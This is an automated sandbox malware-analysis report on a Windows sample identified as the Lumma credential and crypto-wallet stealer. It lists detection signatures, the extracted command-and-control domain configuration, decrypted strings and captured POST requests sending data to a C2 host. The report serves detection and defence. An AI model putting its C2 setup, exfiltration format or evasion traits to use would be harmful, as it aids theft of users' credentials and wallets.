Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
Analysis ID:1435768
MD5:2b9166e260cddbc58db20a0c54a6d145
SHA1:1724225b1b9bbd1bd4c3f4a57b6479774dbb1a23
SHA256:ab1686a078433d515b501f5423b3046d6d1f70b2c9be21d2d3bf71b5d8465107
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Entry point lies outside standard sections
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "plaintediousidowsko.shop"], "Build id": "Z9OOR4--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe PID: 5156JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe PID: 5156JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe PID: 5156JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0.2.SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe.640000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "plaintediousidowsko.shop"], "Build id": "Z9OOR4--"}
              Source: https://plaintediousidowsko.shop:443/apiVirustotal: Detection: 9%Perma Link
              Source: https://plaintediousidowsko.shop/apiVirustotal: Detection: 9%Perma Link
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeVirustotal: Detection: 40%Perma Link
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeReversingLabs: Detection: 29%
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: boredimperissvieos.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: holicisticscrarws.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: sweetsquarediaslw.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: plaintediousidowsko.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: miniaturefinerninewjs.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: zippyfinickysofwps.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: obsceneclassyjuwks.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: acceptabledcooeprs.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: plaintediousidowsko.shop
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString decryptor: Z9OOR4--
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: Malware configuration extractorURLs: boredimperissvieos.shop
              Source: Malware configuration extractorURLs: holicisticscrarws.shop
              Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
              Source: Malware configuration extractorURLs: plaintediousidowsko.shop
              Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
              Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
              Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
              Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
              Source: Malware configuration extractorURLs: plaintediousidowsko.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: plaintediousidowsko.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: plaintediousidowsko.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: plaintediousidowsko.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: plaintediousidowsko.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: plaintediousidowsko.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: plaintediousidowsko.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1391Host: plaintediousidowsko.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 576004Host: plaintediousidowsko.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: plaintediousidowsko.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: plaintediousidowsko.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2211686167.0000000001575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/1
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/L
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210158596.0000000003AFB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.000000000152B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212116605.0000000003B09000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136279911.0000000001509000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212116605.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2186916110.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.0000000001554000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210158596.0000000003B09000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2179568486.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210195171.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2179890214.0000000003AFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/api
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/api7
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2173793881.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2171668626.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2174013392.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2186916110.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2179568486.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2179890214.0000000003AFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2173644952.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2173524997.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/apiGM
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129194928.000000000150D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/apiN
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210158596.0000000003AFB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003AFC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212116605.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2186916110.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210195171.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/apil
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/apilo
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2209976994.0000000001570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210314696.0000000001574000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2211686167.0000000001575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/jAX
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136279911.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/p
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212060983.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/xY
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/y
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212060983.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop/~
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136279911.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plaintediousidowsko.shop:443/api
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163766849.0000000003C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163766849.0000000003C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164205497.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164205497.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163766849.0000000003C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163766849.0000000003C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
